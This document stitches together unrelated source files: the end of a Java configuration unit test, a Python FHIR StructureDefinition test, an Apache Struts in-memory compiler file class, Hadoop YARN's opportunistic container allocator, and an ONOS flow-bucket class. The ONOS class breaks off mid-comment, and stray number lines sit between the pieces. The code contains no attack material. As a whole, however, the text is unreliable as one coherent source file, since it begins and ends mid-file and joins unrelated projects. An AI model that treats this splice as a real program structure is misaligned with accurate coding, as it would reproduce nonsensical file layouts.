		when(wrapper.getPropertyBoolean(PROP_CONTROLLER_PLUGIN_SUPPORT)).thenReturn(false);
		assertThat(config.isPluginSupported(), is(false));

		// dev_mode true with plugin support disabled: still not supported.
		when(wrapper.getPropertyBoolean(PROP_CONTROLLER_DEV_MODE)).thenReturn(true);
		when(wrapper.getPropertyBoolean(PROP_CONTROLLER_PLUGIN_SUPPORT)).thenReturn(false);
		assertThat(config.isPluginSupported(), is(false));

		// dev_mode false with plugin support disabled: not supported.
		// NOTE(review): duplicates the first case above — likely a copy/paste slip.
		when(wrapper.getPropertyBoolean(PROP_CONTROLLER_DEV_MODE)).thenReturn(false);
		when(wrapper.getPropertyBoolean(PROP_CONTROLLER_PLUGIN_SUPPORT)).thenReturn(false);
		assertThat(config.isPluginSupported(), is(false));

		// Plugin support enabled: supported even when dev_mode is true.
		// NOTE(review): the original comment said "it should be false", which
		// contradicts the assertion below; the code asserts true.
		when(wrapper.getPropertyBoolean(PROP_CONTROLLER_DEV_MODE)).thenReturn(true);
		when(wrapper.getPropertyBoolean(PROP_CONTROLLER_PLUGIN_SUPPORT)).thenReturn(true);
		assertThat(config.isPluginSupported(), is(true));

		// dev_mode forces security off even if the security property is true.
		when(wrapper.getPropertyBoolean(PROP_CONTROLLER_DEV_MODE)).thenReturn(true);
		when(wrapper.getPropertyBoolean(PROP_CONTROLLER_SECURITY)).thenReturn(true);
		assertThat(config.isSecurityEnabled(), is(false));

		// Outside dev_mode, security follows the security property.
		when(wrapper.getPropertyBoolean(PROP_CONTROLLER_DEV_MODE)).thenReturn(false);
		when(wrapper.getPropertyBoolean(PROP_CONTROLLER_SECURITY)).thenReturn(true);
		assertThat(config.isSecurityEnabled(), is(true));

		when(wrapper.getPropertyBoolean(PROP_CONTROLLER_DEV_MODE)).thenReturn(false);
		when(wrapper.getPropertyBoolean(PROP_CONTROLLER_SECURITY)).thenReturn(false);
		assertThat(config.isSecurityEnabled(), is(false));
	}

	@Test
	public void testPolicyFileLoad() {
		// The bundled process/thread policy must be a JavaScript function body.
		String processAndThreadPolicyScript = config.getProcessAndThreadPolicyScript();
		assertThat(processAndThreadPolicyScript, containsString("function"));
	}

	@Test
	public void testVersionString() {
		// The build must embed a concrete version, not the UNKNOWN fallback.
		String version = config.getVersion();
		assertThat(version, not("UNKNOWN"));
	}

	@Test
	public void testLoadExtendProperties() {
		// In cluster mode, properties from system-ex.conf in the extended home
		// override the region configuration.
		config.cluster = true;
		Properties wrapper = new Properties();
		wrapper.put(PROP_CLUSTER_REGION, "TestNewRegion");
		config.doRealOnRegion = true;
		// set mock exHome and test
		Home mockExHome = mock(Home.class);
		when(mockExHome.getProperties("system-ex.conf")).thenReturn(wrapper);
		when(mockExHome.exists()).thenReturn(true);
		ReflectionTestUtils.setField(config, "exHome", mockExHome);
		config.loadProperties();
		assertThat(config.getRegion(), is("TestNewRegion"));
	}
}
1,531
418
#!/usr/bin/env python # -*- coding: utf-8 -*- # # Generated from FHIR 4.0.0-a53ec6ee1b on 2019-05-07. # 2019, SMART Health IT. import os import io import unittest import json from . import structuredefinition from .fhirdate import FHIRDate class StructureDefinitionTests(unittest.TestCase): def instantiate_from(self, filename): datadir = os.environ.get('FHIR_UNITTEST_DATADIR') or '' with io.open(os.path.join(datadir, filename), 'r', encoding='utf-8') as handle: js = json.load(handle) self.assertEqual("StructureDefinition", js["resourceType"]) return structuredefinition.StructureDefinition(js) def testStructureDefinition1(self): inst = self.instantiate_from("structuredefinition-example-section-library.json") self.assertIsNotNone(inst, "Must have instantiated a StructureDefinition instance") self.implStructureDefinition1(inst) js = inst.as_json() self.assertEqual("StructureDefinition", js["resourceType"]) inst2 = structuredefinition.StructureDefinition(js) self.implStructureDefinition1(inst2) def implStructureDefinition1(self, inst): self.assertTrue(inst.abstract) self.assertEqual(inst.baseDefinition, "http://hl7.org/fhir/StructureDefinition/Composition") self.assertEqual(inst.date.date, FHIRDate("2018-11-05T17:57:00+11:00").date) self.assertEqual(inst.date.as_json(), "2018-11-05T17:57:00+11:00") self.assertEqual(inst.derivation, "constraint") self.assertEqual(inst.differential.element[0].id, "Composition") self.assertEqual(inst.differential.element[0].path, "Composition") self.assertEqual(inst.differential.element[1].id, "Composition.section") self.assertEqual(inst.differential.element[1].path, "Composition.section") self.assertEqual(inst.differential.element[1].slicing.description, "Slice by .section.code when using this library of sections") self.assertEqual(inst.differential.element[1].slicing.discriminator[0].path, "code") self.assertEqual(inst.differential.element[1].slicing.discriminator[0].type, "pattern") 
self.assertTrue(inst.differential.element[1].slicing.ordered) self.assertEqual(inst.differential.element[1].slicing.rules, "closed") self.assertEqual(inst.differential.element[2].id, "Composition.section:procedure") self.assertEqual(inst.differential.element[2].path, "Composition.section") self.assertEqual(inst.differential.element[2].sliceName, "procedure") self.assertEqual(inst.differential.element[3].fixedString, "Procedures Performed") self.assertEqual(inst.differential.element[3].id, "Composition.section:procedure.title") self.assertEqual(inst.differential.element[3].min, 1) self.assertEqual(inst.differential.element[3].path, "Composition.section.title") self.assertEqual(inst.differential.element[4].id, "Composition.section:procedure.code") self.assertEqual(inst.differential.element[4].min, 1) self.assertEqual(inst.differential.element[4].path, "Composition.section.code") self.assertEqual(inst.differential.element[4].patternCodeableConcept.coding[0].code, "29554-3") self.assertEqual(inst.differential.element[4].patternCodeableConcept.coding[0].display, "Procedure Narrative") self.assertEqual(inst.differential.element[4].patternCodeableConcept.coding[0].system, "http://loinc.org") self.assertEqual(inst.differential.element[5].id, "Composition.section:medications") self.assertEqual(inst.differential.element[5].path, "Composition.section") self.assertEqual(inst.differential.element[5].sliceName, "medications") self.assertEqual(inst.differential.element[6].fixedString, "Medications Administered") self.assertEqual(inst.differential.element[6].id, "Composition.section:medications.title") self.assertEqual(inst.differential.element[6].min, 1) self.assertEqual(inst.differential.element[6].path, "Composition.section.title") self.assertEqual(inst.differential.element[7].id, "Composition.section:medications.code") self.assertEqual(inst.differential.element[7].min, 1) self.assertEqual(inst.differential.element[7].path, "Composition.section.code") 
self.assertEqual(inst.differential.element[7].patternCodeableConcept.coding[0].code, "29549-3") self.assertEqual(inst.differential.element[7].patternCodeableConcept.coding[0].display, "Medication administered Narrative") self.assertEqual(inst.differential.element[7].patternCodeableConcept.coding[0].system, "http://loinc.org") self.assertEqual(inst.differential.element[8].id, "Composition.section:plan") self.assertEqual(inst.differential.element[8].path, "Composition.section") self.assertEqual(inst.differential.element[8].sliceName, "plan") self.assertEqual(inst.differential.element[9].fixedString, "Discharge Treatment Plan") self.assertEqual(inst.differential.element[9].id, "Composition.section:plan.title") self.assertEqual(inst.differential.element[9].min, 1) self.assertEqual(inst.differential.element[9].path, "Composition.section.title") self.assertFalse(inst.experimental) self.assertEqual(inst.id, "example-section-library") self.assertEqual(inst.kind, "complex-type") self.assertEqual(inst.name, "DocumentSectionLibrary") self.assertEqual(inst.status, "active") self.assertEqual(inst.text.status, "generated") self.assertEqual(inst.title, "Document Section Library (For testing section templates)") self.assertEqual(inst.type, "Composition") self.assertEqual(inst.url, "http://hl7.org/fhir/StructureDefinition/example-section-library") def testStructureDefinition2(self): inst = self.instantiate_from("structuredefinition-example-composition.json") self.assertIsNotNone(inst, "Must have instantiated a StructureDefinition instance") self.implStructureDefinition2(inst) js = inst.as_json() self.assertEqual("StructureDefinition", js["resourceType"]) inst2 = structuredefinition.StructureDefinition(js) self.implStructureDefinition2(inst2) def implStructureDefinition2(self, inst): self.assertFalse(inst.abstract) self.assertEqual(inst.baseDefinition, "http://hl7.org/fhir/StructureDefinition/Composition") self.assertEqual(inst.date.date, FHIRDate("2018-11-05T17:47:00+11:00").date) 
self.assertEqual(inst.date.as_json(), "2018-11-05T17:47:00+11:00") self.assertEqual(inst.derivation, "constraint") self.assertEqual(inst.differential.element[0].id, "Composition") self.assertEqual(inst.differential.element[0].path, "Composition") self.assertEqual(inst.differential.element[1].id, "Composition.section") self.assertEqual(inst.differential.element[1].path, "Composition.section") self.assertEqual(inst.differential.element[1].slicing.description, "Slice by .section.code") self.assertEqual(inst.differential.element[1].slicing.discriminator[0].path, "code") self.assertEqual(inst.differential.element[1].slicing.discriminator[0].type, "pattern") self.assertTrue(inst.differential.element[1].slicing.ordered) self.assertEqual(inst.differential.element[1].slicing.rules, "closed") self.assertEqual(inst.differential.element[2].id, "Composition.section:procedure") self.assertEqual(inst.differential.element[2].min, 1) self.assertEqual(inst.differential.element[2].path, "Composition.section") self.assertEqual(inst.differential.element[2].sliceName, "procedure") self.assertEqual(inst.differential.element[2].type[0].code, "BackboneElement") self.assertEqual(inst.differential.element[2].type[0].profile[0], "http://hl7.org/fhir/StructureDefinition/document-section-library") self.assertEqual(inst.differential.element[3].id, "Composition.section:medications") self.assertEqual(inst.differential.element[3].min, 1) self.assertEqual(inst.differential.element[3].path, "Composition.section") self.assertEqual(inst.differential.element[3].sliceName, "medications") self.assertEqual(inst.differential.element[3].type[0].code, "BackboneElement") self.assertEqual(inst.differential.element[3].type[0].profile[0], "http://hl7.org/fhir/StructureDefinition/document-section-library") self.assertEqual(inst.differential.element[4].id, "Composition.section:plan") self.assertEqual(inst.differential.element[4].min, 0) self.assertEqual(inst.differential.element[4].path, "Composition.section") 
self.assertEqual(inst.differential.element[4].sliceName, "plan") self.assertEqual(inst.differential.element[4].type[0].code, "BackboneElement") self.assertEqual(inst.differential.element[4].type[0].profile[0], "http://hl7.org/fhir/StructureDefinition/document-section-library") self.assertFalse(inst.experimental) self.assertEqual(inst.id, "example-composition") self.assertEqual(inst.kind, "complex-type") self.assertEqual(inst.name, "DocumentStructure") self.assertEqual(inst.status, "active") self.assertEqual(inst.text.status, "generated") self.assertEqual(inst.title, "Document Structure (For testing section templates)") self.assertEqual(inst.type, "Composition") self.assertEqual(inst.url, "http://hl7.org/fhir/StructureDefinition/example-composition")
3,780
1,330
/* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.apache.struts2.compiler; import javax.tools.JavaFileObject; import javax.tools.SimpleJavaFileObject; import java.io.*; import java.net.URI; import java.net.URISyntaxException; /** * Captures the output of the java compiler in memory */ public class MemoryJavaFileObject extends SimpleJavaFileObject { private ByteArrayOutputStream out; public MemoryJavaFileObject(String name, JavaFileObject.Kind kind) { super(toURI(name), kind); } public InputStream openInputStream() throws IOException, IllegalStateException, UnsupportedOperationException { return new ByteArrayInputStream(out.toByteArray()); } public OutputStream openOutputStream() throws IOException, IllegalStateException, UnsupportedOperationException { return out = new ByteArrayOutputStream(); } private static URI toURI(String name) { try { return new URI(name); } catch (URISyntaxException e) { throw new RuntimeException(e); } } public byte[] toByteArray() { return out.toByteArray(); } }
658
14,425
/**
 * Licensed to the Apache Software Foundation (ASF) under one
 * or more contributor license agreements. See the NOTICE file
 * distributed with this work for additional information
 * regarding copyright ownership. The ASF licenses this file
 * to you under the Apache License, Version 2.0 (the
 * "License"); you may not use this file except in compliance
 * with the License. You may obtain a copy of the License at
 *
 *     http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

package org.apache.hadoop.yarn.server.scheduler;

import org.apache.commons.lang3.StringUtils;
import org.apache.hadoop.yarn.api.records.ApplicationAttemptId;
import org.apache.hadoop.yarn.api.records.Container;
import org.apache.hadoop.yarn.api.records.Resource;
import org.apache.hadoop.yarn.api.records.ResourceBlacklistRequest;
import org.apache.hadoop.yarn.api.records.ResourceRequest;
import org.apache.hadoop.yarn.exceptions.YarnException;
import org.apache.hadoop.yarn.server.api.protocolrecords.RemoteNode;
import org.apache.hadoop.yarn.server.metrics.OpportunisticSchedulerMetrics;
import org.apache.hadoop.yarn.server.security.BaseContainerTokenSecretManager;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;

import java.util.ArrayList;
import java.util.Collection;
import java.util.HashMap;
import java.util.HashSet;
import java.util.LinkedList;
import java.util.List;
import java.util.Map;
import java.util.Set;

/**
 * <p>
 * The DistributedOpportunisticContainerAllocator allocates containers on a
 * given list of nodes, after modifying the container sizes to respect the
 * limits set by the ResourceManager. It tries to distribute the containers
 * as evenly as possible.
 * </p>
 */
public class DistributedOpportunisticContainerAllocator
    extends OpportunisticContainerAllocator {

  // Candidate-selection passes: node-local first, then rack-local, then
  // anywhere (off-switch). See allocateContainersInternal().
  private static final int NODE_LOCAL_LOOP = 0;
  private static final int RACK_LOCAL_LOOP = 1;
  private static final int OFF_SWITCH_LOOP = 2;
  private static final Logger LOG =
      LoggerFactory.getLogger(DistributedOpportunisticContainerAllocator.class);

  /**
   * Create a new Opportunistic Container Allocator.
   * @param tokenSecretManager TokenSecretManager
   */
  public DistributedOpportunisticContainerAllocator(
      BaseContainerTokenSecretManager tokenSecretManager) {
    super(tokenSecretManager);
  }

  /**
   * Create a new Opportunistic Container Allocator.
   * @param tokenSecretManager TokenSecretManager
   * @param maxAllocationsPerAMHeartbeat max number of containers to be
   *     allocated in one AM heartbeat
   */
  public DistributedOpportunisticContainerAllocator(
      BaseContainerTokenSecretManager tokenSecretManager,
      int maxAllocationsPerAMHeartbeat) {
    super(tokenSecretManager, maxAllocationsPerAMHeartbeat);
  }

  @Override
  public List<Container> allocateContainers(ResourceBlacklistRequest blackList,
      List<ResourceRequest> oppResourceReqs,
      ApplicationAttemptId applicationAttemptId,
      OpportunisticContainerContext opportContext, long rmIdentifier,
      String appSubmitter) throws YarnException {
    // Update black list.
    updateBlacklist(blackList, opportContext);

    // Add OPPORTUNISTIC requests to the outstanding ones.
    opportContext.addToOutstandingReqs(oppResourceReqs);
    Set<String> nodeBlackList = new HashSet<>(opportContext.getBlacklist());
    Set<String> allocatedNodes = new HashSet<>();
    List<Container> allocatedContainers = new ArrayList<>();

    // Satisfy the outstanding OPPORTUNISTIC requests.
    // Keep iterating over the outstanding scheduler keys until a full pass
    // produces no new allocations (or the per-heartbeat cap is hit).
    boolean continueLoop = true;
    while (continueLoop) {
      continueLoop = false;
      List<Map<Resource, List<Allocation>>> allocations = new ArrayList<>();
      for (SchedulerRequestKey schedulerKey :
          opportContext.getOutstandingOpReqs().descendingKeySet()) {
        // Allocated containers :
        //  Key = Requested Capability,
        //  Value = List of Containers of given cap (the actual container size
        //          might be different than what is requested, which is why
        //          we need the requested capability (key) to match against
        //          the outstanding reqs)
        // remAllocs == -1 means "no cap" (cap feature disabled).
        int remAllocs = -1;
        int maxAllocationsPerAMHeartbeat = getMaxAllocationsPerAMHeartbeat();
        if (maxAllocationsPerAMHeartbeat > 0) {
          remAllocs =
              maxAllocationsPerAMHeartbeat - allocatedContainers.size()
                  - getTotalAllocations(allocations);
          if (remAllocs <= 0) {
            LOG.info("Not allocating more containers as we have reached max "
                    + "allocations per AM heartbeat {}",
                maxAllocationsPerAMHeartbeat);
            break;
          }
        }
        Map<Resource, List<Allocation>> allocation = allocate(
            rmIdentifier, opportContext, schedulerKey, applicationAttemptId,
            appSubmitter, nodeBlackList, allocatedNodes, remAllocs);
        if (allocation.size() > 0) {
          allocations.add(allocation);
          continueLoop = true;
        }
      }
      matchAllocation(allocations, allocatedContainers, opportContext);
    }
    return allocatedContainers;
  }

  /**
   * Allocates containers for every outstanding enriched request under one
   * scheduler key, honoring {@code maxAllocations} (negative = unlimited).
   */
  private Map<Resource, List<Allocation>> allocate(long rmIdentifier,
      OpportunisticContainerContext appContext, SchedulerRequestKey schedKey,
      ApplicationAttemptId appAttId, String userName, Set<String> blackList,
      Set<String> allocatedNodes, int maxAllocations)
      throws YarnException {
    Map<Resource, List<Allocation>> containers = new HashMap<>();
    for (EnrichedResourceRequest enrichedAsk :
        appContext.getOutstandingOpReqs().get(schedKey).values()) {
      int remainingAllocs = -1;
      if (maxAllocations > 0) {
        // Recompute how many allocations are still allowed across all
        // capability buckets accumulated so far.
        int totalAllocated = 0;
        for (List<Allocation> allocs : containers.values()) {
          totalAllocated += allocs.size();
        }
        remainingAllocs = maxAllocations - totalAllocated;
        if (remainingAllocs <= 0) {
          LOG.info("Not allocating more containers as max allocations per AM "
              + "heartbeat {} has reached", getMaxAllocationsPerAMHeartbeat());
          break;
        }
      }
      allocateContainersInternal(rmIdentifier, appContext.getAppParams(),
          appContext.getContainerIdGenerator(), blackList, allocatedNodes,
          appAttId, appContext.getNodeMap(), userName, containers, enrichedAsk,
          remainingAllocs);
      ResourceRequest anyAsk = enrichedAsk.getRequest();
      if (!containers.isEmpty()) {
        LOG.info("Opportunistic allocation requested for [priority={}, "
                + "allocationRequestId={}, num_containers={}, capability={}] "
                + "allocated = {}", anyAsk.getPriority(),
            anyAsk.getAllocationRequestId(), anyAsk.getNumContainers(),
            anyAsk.getCapability(), containers.keySet());
      }
    }
    return containers;
  }

  /**
   * Core placement loop for one enriched request: walks candidate nodes in
   * locality order (node-local, rack-local, off-switch) and creates containers
   * until the target count or {@code maxAllocations} is reached.
   */
  private void allocateContainersInternal(long rmIdentifier,
      AllocationParams appParams, ContainerIdGenerator idCounter,
      Set<String> blacklist, Set<String> allocatedNodes,
      ApplicationAttemptId id, Map<String, RemoteNode> allNodes,
      String userName, Map<Resource, List<Allocation>> allocations,
      EnrichedResourceRequest enrichedAsk, int maxAllocations)
      throws YarnException {
    if (allNodes.size() == 0) {
      LOG.info("No nodes currently available to "
          + "allocate OPPORTUNISTIC containers.");
      return;
    }
    ResourceRequest anyAsk = enrichedAsk.getRequest();
    // Remaining ask = requested minus what this capability already got.
    int toAllocate = anyAsk.getNumContainers()
        - (allocations.isEmpty() ? 0 :
            allocations.get(anyAsk.getCapability()).size());
    toAllocate = Math.min(toAllocate,
        appParams.getMaxAllocationsPerSchedulerKeyPerRound());
    if (maxAllocations >= 0) {
      toAllocate = Math.min(maxAllocations, toAllocate);
    }
    int numAllocated = 0;
    // Node Candidates are selected as follows:
    // * Node local candidates selected in loop == 0
    // * Rack local candidates selected in loop == 1
    // * From loop == 2 onwards, we revert to off switch allocations.
    int loopIndex = OFF_SWITCH_LOOP;
    if (enrichedAsk.getNodeMap().size() > 0) {
      loopIndex = NODE_LOCAL_LOOP;
    }
    while (numAllocated < toAllocate) {
      Collection<RemoteNode> nodeCandidates =
          findNodeCandidates(loopIndex, allNodes, blacklist, allocatedNodes,
              enrichedAsk);
      for (RemoteNode rNode : nodeCandidates) {
        String rNodeHost = rNode.getNodeId().getHost();
        // Ignore black list
        if (blacklist.contains(rNodeHost)) {
          LOG.info("Nodes for scheduling has a blacklisted node" + " ["
              + rNodeHost + "]..");
          continue;
        }
        String location = ResourceRequest.ANY;
        if (loopIndex == NODE_LOCAL_LOOP) {
          if (enrichedAsk.getNodeMap().containsKey(rNodeHost)) {
            location = rNodeHost;
          } else {
            continue;
          }
        } else if (allocatedNodes.contains(rNodeHost)) {
          // Spread: outside the node-local pass, avoid re-using a host that
          // already received an opportunistic container this round.
          LOG.info("Opportunistic container has already been allocated on {}.",
              rNodeHost);
          continue;
        }
        if (loopIndex == RACK_LOCAL_LOOP) {
          if (enrichedAsk.getRackMap().containsKey(
              rNode.getRackName())) {
            location = rNode.getRackName();
          } else {
            continue;
          }
        }
        Container container = createContainer(rmIdentifier, appParams,
            idCounter, id, userName, allocations, location,
            anyAsk, rNode);
        numAllocated++;
        updateMetrics(loopIndex);
        allocatedNodes.add(rNodeHost);
        LOG.info("Allocated [" + container.getId() + "] as opportunistic at "
            + "location [" + location + "]");
        if (numAllocated >= toAllocate) {
          break;
        }
      }
      // Escalate locality: node-local -> rack-local (if racks were asked
      // for) -> off-switch.
      if (loopIndex == NODE_LOCAL_LOOP
          && enrichedAsk.getRackMap().size() > 0) {
        loopIndex = RACK_LOCAL_LOOP;
      } else {
        loopIndex++;
      }
      // Handle case where there are no nodes remaining after blacklist is
      // considered.
      if (loopIndex > OFF_SWITCH_LOOP && numAllocated == 0) {
        LOG.warn("Unable to allocate any opportunistic containers.");
        break;
      }
    }
  }

  /**
   * Bumps the per-locality allocation counter for the pass that produced an
   * allocation.
   */
  private void updateMetrics(int loopIndex) {
    OpportunisticSchedulerMetrics metrics =
        OpportunisticSchedulerMetrics.getMetrics();
    if (loopIndex == NODE_LOCAL_LOOP) {
      metrics.incrNodeLocalOppContainers();
    } else if (loopIndex == RACK_LOCAL_LOOP) {
      metrics.incrRackLocalOppContainers();
    } else {
      metrics.incrOffSwitchOppContainers();
    }
  }

  /**
   * Returns candidate nodes for the current locality pass, filtered to the
   * request's node partition. Off-switch passes (loopIndex > 1) return every
   * partition-matching node.
   */
  private Collection<RemoteNode> findNodeCandidates(int loopIndex,
      Map<String, RemoteNode> allNodes, Set<String> blackList,
      Set<String> allocatedNodes, EnrichedResourceRequest enrichedRR) {
    LinkedList<RemoteNode> retList = new LinkedList<>();
    String partition = getRequestPartition(enrichedRR);
    if (loopIndex > 1) {
      for (RemoteNode remoteNode : allNodes.values()) {
        if (StringUtils.equals(partition, getRemoteNodePartition(remoteNode))) {
          retList.add(remoteNode);
        }
      }
      return retList;
    } else {
      int numContainers = enrichedRR.getRequest().getNumContainers();
      while (numContainers > 0) {
        if (loopIndex == 0) {
          // Node local candidates
          numContainers = collectNodeLocalCandidates(
              allNodes, enrichedRR, retList, numContainers);
        } else {
          // Rack local candidates
          numContainers =
              collectRackLocalCandidates(allNodes, enrichedRR, retList,
                  blackList, allocatedNodes, numContainers);
        }
        if (numContainers == enrichedRR.getRequest().getNumContainers()) {
          // If there is no change in numContainers, then there is no point
          // in looping again.
          break;
        }
      }
      return retList;
    }
  }

  /**
   * Collects rack-local candidates; hosts that already received a container
   * are appended last (lowest priority) and do not count against the quota.
   */
  private int collectRackLocalCandidates(Map<String, RemoteNode> allNodes,
      EnrichedResourceRequest enrichedRR, LinkedList<RemoteNode> retList,
      Set<String> blackList, Set<String> allocatedNodes, int numContainers) {
    String partition = getRequestPartition(enrichedRR);
    for (RemoteNode rNode : allNodes.values()) {
      if (StringUtils.equals(partition, getRemoteNodePartition(rNode))
          && enrichedRR.getRackMap().containsKey(rNode.getRackName())) {
        String rHost = rNode.getNodeId().getHost();
        if (blackList.contains(rHost)) {
          continue;
        }
        if (allocatedNodes.contains(rHost)) {
          retList.addLast(rNode);
        } else {
          retList.addFirst(rNode);
          numContainers--;
        }
      }
      if (numContainers == 0) {
        break;
      }
    }
    return numContainers;
  }

  /**
   * Collects candidates from the hosts the request explicitly named,
   * restricted to the request's partition.
   */
  private int collectNodeLocalCandidates(Map<String, RemoteNode> allNodes,
      EnrichedResourceRequest enrichedRR, List<RemoteNode> retList,
      int numContainers) {
    String partition = getRequestPartition(enrichedRR);
    for (String nodeName : enrichedRR.getNodeMap().keySet()) {
      RemoteNode remoteNode = allNodes.get(nodeName);
      if (remoteNode != null
          && StringUtils.equals(partition,
              getRemoteNodePartition(remoteNode))) {
        retList.add(remoteNode);
        numContainers--;
      }
      if (numContainers == 0) {
        break;
      }
    }
    return numContainers;
  }
}
5,291
1,091
/*
 * Copyright 2018-present Open Networking Foundation
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */
package org.onosproject.store.flow.impl;

import java.util.Map;
import java.util.concurrent.atomic.AtomicReference;
import java.util.function.Function;
import java.util.stream.Collectors;

import com.google.common.collect.Maps;
import org.onosproject.core.ApplicationId;
import org.onosproject.net.flow.DefaultFlowEntry;
import org.onosproject.net.flow.FlowEntry;
import org.onosproject.net.flow.FlowId;
import org.onosproject.net.flow.FlowRule;
import org.onosproject.net.flow.StoredFlowEntry;
import org.onosproject.store.LogicalTimestamp;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;

/**
 * Container for a bucket of flows assigned to a specific device.
 * <p>
 * The bucket is mutable. When changes are made to the bucket, the term and timestamp in which the change
 * occurred is recorded for ordering changes.
 */
public class FlowBucket {
    private static final Logger LOGGER = LoggerFactory.getLogger(FlowBucket.class);
    private final BucketId bucketId;
    // volatile: term/timestamp are read for digests from other threads than
    // the one applying updates; the maps below are concurrent for the same
    // reason.
    private volatile long term;
    private volatile LogicalTimestamp timestamp;
    private final Map<FlowId, Map<StoredFlowEntry, StoredFlowEntry>> flowBucket;

    FlowBucket(BucketId bucketId) {
        this(bucketId, 0, new LogicalTimestamp(0), Maps.newConcurrentMap());
    }

    private FlowBucket(
        BucketId bucketId,
        long term,
        LogicalTimestamp timestamp,
        Map<FlowId, Map<StoredFlowEntry, StoredFlowEntry>> flowBucket) {
        this.bucketId = bucketId;
        this.term = term;
        this.timestamp = timestamp;
        this.flowBucket = flowBucket;
    }

    /**
     * Returns the flow bucket identifier.
     *
     * @return the flow bucket identifier
     */
    public BucketId bucketId() {
        return bucketId;
    }

    /**
     * Returns the flow bucket term.
     *
     * @return the flow bucket term
     */
    public long term() {
        return term;
    }

    /**
     * Returns the flow bucket timestamp.
     *
     * @return the flow bucket timestamp
     */
    public LogicalTimestamp timestamp() {
        return timestamp;
    }

    /**
     * Returns the digest for the bucket.
     *
     * @return the digest for the bucket
     */
    public FlowBucketDigest getDigest() {
        return new FlowBucketDigest(bucketId().bucket(), term(), timestamp());
    }

    /**
     * Returns the flow entries in the bucket.
     *
     * @return the flow entries in the bucket
     */
    public Map<FlowId, Map<StoredFlowEntry, StoredFlowEntry>> getFlowBucket() {
        return flowBucket;
    }

    /**
     * Returns the flow entries for the given flow.
     *
     * @param flowId the flow identifier
     * @return the flows for the given flow ID
     */
    public Map<StoredFlowEntry, StoredFlowEntry> getFlowEntries(FlowId flowId) {
        // Plain get() first; fall through to computeIfAbsent only on a miss so
        // the common hit path avoids computeIfAbsent's per-key locking.
        Map<StoredFlowEntry, StoredFlowEntry> flowEntries = flowBucket.get(flowId);
        return flowEntries != null ? flowEntries : flowBucket.computeIfAbsent(flowId, id -> Maps.newConcurrentMap());
    }

    /**
     * Counts the flows in the bucket.
     *
     * @return the number of flows in the bucket
     */
    public int count() {
        return flowBucket.values()
            .stream()
            .mapToInt(entry -> entry.values().size())
            .sum();
    }

    /**
     * Returns a new copy of the flow bucket.
     *
     * @return a new copy of the flow bucket
     */
    FlowBucket copy() {
        return new FlowBucket(
            bucketId,
            term,
            timestamp,
            flowBucket.entrySet()
                .stream()
                .map(e -> Maps.immutableEntry(e.getKey(), Maps.newHashMap(e.getValue())))
                .collect(Collectors.toMap(e -> e.getKey(), e -> e.getValue())));
    }

    /**
     * Records an update to the bucket.
     */
    private void recordUpdate(long term, LogicalTimestamp timestamp) {
        this.term = term;
        this.timestamp = timestamp;
    }

    /**
     * Adds the given flow rule to the bucket.
     *
     * @param rule the rule to add
     * @param term the term in which the change occurred
     * @param clock the logical clock
     */
    public void add(FlowEntry rule, long term, LogicalClock clock) {
        Map<StoredFlowEntry, StoredFlowEntry> flowEntries = flowBucket.get(rule.id());
        if (flowEntries == null) {
            flowEntries = flowBucket.computeIfAbsent(rule.id(), id -> Maps.newConcurrentMap());
        }
        flowEntries.put((StoredFlowEntry) rule, (StoredFlowEntry) rule);
        recordUpdate(term, clock.getTimestamp());
    }

    /**
     * Updates the given flow rule in the bucket.
     *
     * @param rule the rule to update
     * @param term the term in which the change occurred
     * @param clock the logical clock
     */
    public void update(FlowEntry rule, long term, LogicalClock clock) {
        Map<StoredFlowEntry, StoredFlowEntry> flowEntries = flowBucket.get(rule.id());
        if (flowEntries == null) {
            flowEntries = flowBucket.computeIfAbsent(rule.id(), id -> Maps.newConcurrentMap());
        }
        flowEntries.computeIfPresent((StoredFlowEntry) rule, (k, stored) -> {
            if (rule instanceof DefaultFlowEntry) {
                DefaultFlowEntry updated = (DefaultFlowEntry) rule;
                if (stored instanceof DefaultFlowEntry) {
                    DefaultFlowEntry storedEntry = (DefaultFlowEntry) stored;
                    // Only replace if the incoming entry is at least as new;
                    // otherwise keep the stored entry.
                    if (updated.created() >= storedEntry.created()) {
                        recordUpdate(term, clock.getTimestamp());
                        return updated;
                    } else {
                        LOGGER.debug("Trying to update more recent flow entry {} (stored: {})", updated, stored);
                        return stored;
                    }
                }
            }
            return stored;
        });
    }

    /**
     * Applies the given update function to the rule.
     *
     * @param rule the rule to update
     * @param function the update function to apply
     * @param term the term in which the change occurred
     * @param clock the logical clock
     * @param <T> the result type
     * @return the update result or {@code null} if the rule was not updated
     */
    public <T> T update(FlowRule rule, Function<StoredFlowEntry, T> function, long term, LogicalClock clock) {
        Map<StoredFlowEntry, StoredFlowEntry> flowEntries = flowBucket.get(rule.id());
        if (flowEntries == null) {
            flowEntries = flowBucket.computeIfAbsent(rule.id(), id -> Maps.newConcurrentMap());
        }
        // AtomicReference carries the function's result out of the
        // computeIfPresent lambda (locals captured by lambdas must be
        // effectively final).
        AtomicReference<T> resultRef = new AtomicReference<>();
        flowEntries.computeIfPresent(new DefaultFlowEntry(rule), (k, stored) -> {
            if (stored != null) {
                T result = function.apply(stored);
                if (result != null) {
                    recordUpdate(term, clock.getTimestamp());
                    resultRef.set(result);
                }
            }
            return stored;
        });
        return resultRef.get();
    }

    /**
